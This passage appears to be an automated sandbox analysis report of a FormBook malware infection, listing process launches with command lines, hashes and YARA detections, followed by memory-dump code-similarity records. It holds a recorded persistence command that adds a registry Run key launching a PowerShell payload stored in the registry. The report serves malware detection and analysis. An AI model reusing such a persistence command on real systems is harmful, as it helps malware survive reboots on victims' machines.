                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:28
                                              Start time:07:41:11
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
                                              Imagebase:0x560000
                                              File size:59'392 bytes
                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:29
                                              Start time:07:41:26
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe"
                                              Imagebase:0xc0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Has exited:false

                                              Target ID:30
                                              Start time:07:41:27
                                              Start date:26/04/2024
                                              Path:C:\Windows\SysWOW64\clip.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\clip.exe"
                                              Imagebase:0xf30000
                                              File size:24'576 bytes
                                              MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:false

                                              Target ID:31
                                              Start time:07:41:41
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe"
                                              Imagebase:0xc0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Has exited:false

                                              Target ID:32
                                              Start time:07:41:46
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:33
                                              Start time:07:41:47
                                              Start date:26/04/2024
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                              Imagebase:0x7ff6d2f00000
                                              File size:71'680 bytes
                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:34
                                              Start time:07:41:53
                                              Start date:26/04/2024
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff79f9e0000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              Target ID:35
                                              Start time:07:41:54
                                              Start date:26/04/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x260000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$(fwl$84ul$84ul$tPcq$tPcq
                                                • API String ID: 0-3478800167
                                                • Opcode ID: e7c8ab76350963e52368acc77a756c30afd1723419eab03b463ad30c68b9e35c
                                                • Instruction ID: cd2e88683d9e4a11255a24f68a6b87ba5bddedc47b18d9150f3d827f9b498528
                                                • Opcode Fuzzy Hash: e7c8ab76350963e52368acc77a756c30afd1723419eab03b463ad30c68b9e35c
                                                • Instruction Fuzzy Hash: 7C828EB4B10209CFDB14CF98C951AAABBB6EF99314F14C069D8059F355CBB2EC45CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$$cq$$cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-1572487497
                                                • Opcode ID: 5df4c6afb091090eb28bd1047c9e50c481a331f4dfc270ae18a4f8f9b9df8af3
                                                • Instruction ID: 16e797e6694da4d0d551dbd41a72ac96d52695c305565fa049574560b2a2efb2
                                                • Opcode Fuzzy Hash: 5df4c6afb091090eb28bd1047c9e50c481a331f4dfc270ae18a4f8f9b9df8af3
                                                • Instruction Fuzzy Hash: 6FE125B170434E8FCB258F28C81476EBFB2AFD6214F1480ABD445CB292DB75C961C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Tgk$0Ucq$4'cq$4'cq$4'cq$4'cq$DUgk$XYwl$XYwl$tPcq$tPcq
                                                • API String ID: 0-3555300875
                                                • Opcode ID: 5f280ffa59826caf173957f340d1475af235911964124b34469f74c46ff1caca
                                                • Instruction ID: 90defcda4f788dc57a234bcc1f053ac352e4cb67900c316dad801318208a4a77
                                                • Opcode Fuzzy Hash: 5f280ffa59826caf173957f340d1475af235911964124b34469f74c46ff1caca
                                                • Instruction Fuzzy Hash: FE425AB170424E8FCB15DF68944166AFFA2AFE6314F24C0BAC445EBA52DB71C851C7A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8Nkj$Hgq$h]kj$h]kj$h]kj$$cq$$cq$Ikj
                                                • API String ID: 0-1331133414
                                                • Opcode ID: 05d62a781bfb7e8edc9bdd53b6ea11e558fbc2538eb15026cdade99ff7afc322
                                                • Instruction ID: 006f57e97aa57c5752102226dee3632585a65c2ba6aca137ed2ed85c527a4178
                                                • Opcode Fuzzy Hash: 05d62a781bfb7e8edc9bdd53b6ea11e558fbc2538eb15026cdade99ff7afc322
                                                • Instruction Fuzzy Hash: 1B226034B112148FCB25DF24C9587AEB7B6BF89304F1484A9D50AAB3A1DF35AD85CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq$4'cq$x.hk$-hk
                                                • API String ID: 0-1331884746
                                                • Opcode ID: b6d50b963754176a48dd3ed79192835d8d3274aa0a23a285151e5bf14fe00dab
                                                • Instruction ID: c87d6c497bd4b277d8784331cb2a535c42bae2367237fd965b6995b92369c40a
                                                • Opcode Fuzzy Hash: b6d50b963754176a48dd3ed79192835d8d3274aa0a23a285151e5bf14fe00dab
                                                • Instruction Fuzzy Hash: 13D184B4A502099FCB18DFA8C555B5EBBB2EF88314F11C025D501AF355CBB5DC86CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$4'cq$4'cq$x.hk$x.hk$-hk
                                                • API String ID: 0-2350833763
                                                • Opcode ID: 563272bfc00ec5e4b5d99a06b9edac0f80131c52c67fd50b27b60c8e86bd9254
                                                • Instruction ID: c5a16fd8f039511b073f7dc311718c3616e9066a455243b378a08660f65897d7
                                                • Opcode Fuzzy Hash: 563272bfc00ec5e4b5d99a06b9edac0f80131c52c67fd50b27b60c8e86bd9254
                                                • Instruction Fuzzy Hash: E4F195B0A002199FDB24DF58C951F6EBBB3EF84300F1580A9D509AF791DB71ED858BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$4'cq$4'cq$x.hk$x.hk
                                                • API String ID: 0-1127448283
                                                • Opcode ID: 08d024fd30a5eb43a9f8968fbe00d6409ecbe536401b568040a4aee8ad1135c1
                                                • Instruction ID: 2bca88bfa0eb1b4c7a1103a68100c35f95b309b680d02a281377ed06701dda4e
                                                • Opcode Fuzzy Hash: 08d024fd30a5eb43a9f8968fbe00d6409ecbe536401b568040a4aee8ad1135c1
                                                • Instruction Fuzzy Hash: A40220B4A40219DFDB64DF64C950BADBBB2EB85304F1081E5DA09AB741CB719EC1CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$4'cq$4'cq$x.hk$x.hk$-hk
                                                • API String ID: 0-335189296
                                                • Opcode ID: 6ad8046e444a0d9a7a934c78844839d86680af6e4c63c1892d4a84b3d3d97870
                                                • Instruction ID: 83c9d72149ad0be6b4837a58aa9bbc603cd6378f31944cfcd5706e288c2c8d48
                                                • Opcode Fuzzy Hash: 6ad8046e444a0d9a7a934c78844839d86680af6e4c63c1892d4a84b3d3d97870
                                                • Instruction Fuzzy Hash: E5E165B4A402189FDB64DF68C954BAEBBB2FF84300F1080A5D6099F391CB759D81CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$$cq$$cq$$cq$$cq
                                                • API String ID: 0-915829551
                                                • Opcode ID: c28832e64be535d5d6d78c6c1a9e4b4ac937b4bba42be52b5ceaf0f5c9d58ce9
                                                • Instruction ID: fe315c69ef59cd855b4eef845b0711ed3e12d3f702dc1c0c982907440812885d
                                                • Opcode Fuzzy Hash: c28832e64be535d5d6d78c6c1a9e4b4ac937b4bba42be52b5ceaf0f5c9d58ce9
                                                • Instruction Fuzzy Hash: 3AB14AF2B0420EDFDB149E68D940677BBA6EFE5314F1480EAD605CB251DBB1C841CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$x.hk$-hk
                                                • API String ID: 0-2992026589
                                                • Opcode ID: 285d5dc401b85625dbdd8c6a62be28755276c1d9e014ca3f4301655666934e5b
                                                • Instruction ID: 97240c4c09e77383e91720381d9a35104447baded97623f466245a89c21a87c7
                                                • Opcode Fuzzy Hash: 285d5dc401b85625dbdd8c6a62be28755276c1d9e014ca3f4301655666934e5b
                                                • Instruction Fuzzy Hash: FAB1A2B4A502099FCB18CF64C554B9EBBB2EF88314F15C055D901AF355CBB6EC86CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'cq$4'cq$4'cq$4'cq
                                                • API String ID: 0-1446110543
                                                • Opcode ID: 29e76e13b82359ad8465cdf2a5ed6134f9a0c4ac4e50797533d156d935da21dd
                                                • Instruction ID: 9e4dbc1f6fcbb1ce762862eb77fe4ba3f51017a2b199b95d96ee1be5cbef3fb9
                                                • Opcode Fuzzy Hash: 29e76e13b82359ad8465cdf2a5ed6134f9a0c4ac4e50797533d156d935da21dd
                                                • Instruction Fuzzy Hash: 6D125AB170821E8FCF259F78840176ABFA2BFE5325F1480BAE505DB651DB71C941CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$(fwl
                                                • API String ID: 0-2374567490
                                                • Opcode ID: 3ee54b1266f890246b7ac7db51a13aed90d65c8a33b4284611846afac89e5522
                                                • Instruction ID: 7e0c3a8deb87f822bdb20411fce7c3a058e71811054f46702527b6d21469efb5
                                                • Opcode Fuzzy Hash: 3ee54b1266f890246b7ac7db51a13aed90d65c8a33b4284611846afac89e5522
                                                • Instruction Fuzzy Hash: CB1278B4A00209DFDB24CF98C541AA9BBB6FF95314F14C069D90AAF356CBB2EC45CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$(fwl$x.hk
                                                • API String ID: 0-1798524581
                                                • Opcode ID: 5f06ac943b17692b872dafa5b7f61e47d20a16ef1c27949cc5be1d4de6f3a885
                                                • Instruction ID: 01a24e84da5ee5a33f0b9ef8ba197e3a025340f91723ad2ffe3a75e3c6ed389a
                                                • Opcode Fuzzy Hash: 5f06ac943b17692b872dafa5b7f61e47d20a16ef1c27949cc5be1d4de6f3a885
                                                • Instruction Fuzzy Hash: 5D91A1F4B102099FDB14DF68C555B9EBBE2AF98314F148068D901AF791CB72EC81CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (fwl$x.hk
                                                • API String ID: 0-1073778575
                                                • Opcode ID: d086235f4e486bdbed241c22fb7d48efd9eb5c0ad3fed2b1cb12a2a2f6fadde9
                                                • Instruction ID: d00be12f9aaa07e470b443211b34dc1dab8ec88afe592c2d77634b4f9ac8775b
                                                • Opcode Fuzzy Hash: d086235f4e486bdbed241c22fb7d48efd9eb5c0ad3fed2b1cb12a2a2f6fadde9
                                                • Instruction Fuzzy Hash: BF91B3F4A102099FCB14DF68C555B9DB7F2AF98314F148069E901AF791CB72EC81CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h]kj$Ikj
                                                • API String ID: 0-2804767068
                                                • Opcode ID: 368d3999047fa406cbbcd28b93659be4669dbdfc0f473a16cfeb217e9193795e
                                                • Instruction ID: 67aee6685a4bb462f142a9a37fc7164c21d25d43b11e2fa8b6a02ecb42a68417
                                                • Opcode Fuzzy Hash: 368d3999047fa406cbbcd28b93659be4669dbdfc0f473a16cfeb217e9193795e
                                                • Instruction Fuzzy Hash: 8A31FA34A011188FCF25DB64C9586EEB7B2AF89305F1144E9D50AAB352CF35AE95CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq$$cq
                                                • API String ID: 0-2695052418
                                                • Opcode ID: fefcf0be667fea60fcc1ae9502c02aad68a939b0ef018d296a54a0cbfa7eaa4c
                                                • Instruction ID: 03fe6157d2afbdc2a492ea7d0fb35764359060d137a57bd09c0f79dffe881c78
                                                • Opcode Fuzzy Hash: fefcf0be667fea60fcc1ae9502c02aad68a939b0ef018d296a54a0cbfa7eaa4c
                                                • Instruction Fuzzy Hash: 941151B570A38EEFD7168F14D940A26BBB1AFE2214B1980DBD645CF1A3E776C804CB11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $cq
                                                • API String ID: 0-2110363268
                                                • Opcode ID: 5d282dc30c6f64764fe5ac9ffa75ce757b5008ebec08d613fd39ab2b5cd2a7a2
                                                • Instruction ID: 6d0c4233fd752f19eca9dd558b37705e6a2a7282f0e8ca807bc3fa01dd192996
                                                • Opcode Fuzzy Hash: 5d282dc30c6f64764fe5ac9ffa75ce757b5008ebec08d613fd39ab2b5cd2a7a2
                                                • Instruction Fuzzy Hash: DA8147B670434E9FCB158F68D81026BBFA5AFD6224F1884EBD544CB292DB71C845C7A2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: x.hk
                                                • API String ID: 0-3394790906
                                                • Opcode ID: d3e3114a4788b9bd20036774af7f199bf2db47e740913c0b36d6cd5415b6cc25
                                                • Instruction ID: 043f88c5ce4f4444c36a846c859f53992cb6bb4e53a33ba621c390c2b725d16f
                                                • Opcode Fuzzy Hash: d3e3114a4788b9bd20036774af7f199bf2db47e740913c0b36d6cd5415b6cc25
                                                • Instruction Fuzzy Hash: 8B31A4B4750108ABD7149BA8C965BAF7BA7DF84354F10C025EA01AF781CFB69C468BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2486085481.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7840000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 0Ucq
                                                • API String ID: 0-3536499240
                                                • Opcode ID: 910b7cef500a5fb96cf19a0fdefb5dcfc8cd97b6522e180e5740c1e1b6c1eca4
                                                • Instruction ID: cd7b2ef9c6a4b6e153c6ece931a8f4519e4e53a7b120668617d24c3bf54ad9ba
                                                • Opcode Fuzzy Hash: 910b7cef500a5fb96cf19a0fdefb5dcfc8cd97b6522e180e5740c1e1b6c1eca4
                                                • Instruction Fuzzy Hash: 561102757083468FC305CF699490A1ABFB6BFC621472984ABD448DF692CE388C46C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4864dcd3ce0ea58977b1f1b62324571f777e23fefc1d72d680c1e573dc41eecf
                                                • Instruction ID: e16b085e0f3bf706944e1ffcaa0d11a9edbe7791336504ec5b1589c8d7e61aeb
                                                • Opcode Fuzzy Hash: 4864dcd3ce0ea58977b1f1b62324571f777e23fefc1d72d680c1e573dc41eecf
                                                • Instruction Fuzzy Hash: 75E10974A01209AFDB15DF98D484AADFFB2FF88310F258569E809AB355C731ED81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4017052d2bc2d9fe73bf73f4eef52189c84fc57f73deb991e64320c3fc50eeba
                                                • Instruction ID: 9862b42a2141a9203719f5648dd63e49968aae51fc479af7639680bafb4b8585
                                                • Opcode Fuzzy Hash: 4017052d2bc2d9fe73bf73f4eef52189c84fc57f73deb991e64320c3fc50eeba
                                                • Instruction Fuzzy Hash: 6EC1CF35A00208CFCB14DFA5E545AADBBB6FF85314F118569E8069B365CB34FC49CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df75eeba35b71591b22f8fa3ebbbc4cdebc3fb405a96337930abdc1d7a9e1d07
                                                • Instruction ID: ef6de81736039db4f19df0182927ac6b8e0db26874dd225b78603d4c89743a7c
                                                • Opcode Fuzzy Hash: df75eeba35b71591b22f8fa3ebbbc4cdebc3fb405a96337930abdc1d7a9e1d07
                                                • Instruction Fuzzy Hash: 11D11574A01249DFCB15CFA8D594A9DFBB2EF88310F25C569E808AB361C731ED81CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1a8e14795da4fe408b9b7d846d7583c573a00248c636bf71d291143349d7f83
                                                • Instruction ID: 5ea4b704b1f77de4e5dd1285646b8602865aac9ce88d383a5c0d98d433d4ccb1
                                                • Opcode Fuzzy Hash: a1a8e14795da4fe408b9b7d846d7583c573a00248c636bf71d291143349d7f83
                                                • Instruction Fuzzy Hash: B191CD34A012589FCB14DF68D884AAEBBF2FF89310F1485B9E4459B362CB35EC85CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f6aef5562233e8bf579fc3e47f8954dc72fc6077e4a609aaba663ae7df5ef0c
                                                • Instruction ID: bda8ef54bf122f67d64af0399cb69b53fe4ef2688e18bbd9a2ea8225b9a7c77c
                                                • Opcode Fuzzy Hash: 4f6aef5562233e8bf579fc3e47f8954dc72fc6077e4a609aaba663ae7df5ef0c
                                                • Instruction Fuzzy Hash: 4791AF34A00249CFCB15DFA4C544AADBBB2FF85301F2585A9E4069F366D778ED89CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b933d0c225ba839978f30fbdd2e2b3da673326865ba534f6bcf014332c82b5e9
                                                • Instruction ID: 85fbc3a7be13b5521b599426695a008622632d05642a4b826fda54cd90f58628
                                                • Opcode Fuzzy Hash: b933d0c225ba839978f30fbdd2e2b3da673326865ba534f6bcf014332c82b5e9
                                                • Instruction Fuzzy Hash: 0E713C70A00608DFDB15EFA4D484BADBBF6BF88305F148429D412AB790DB74AD89CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2456919215.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_49c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
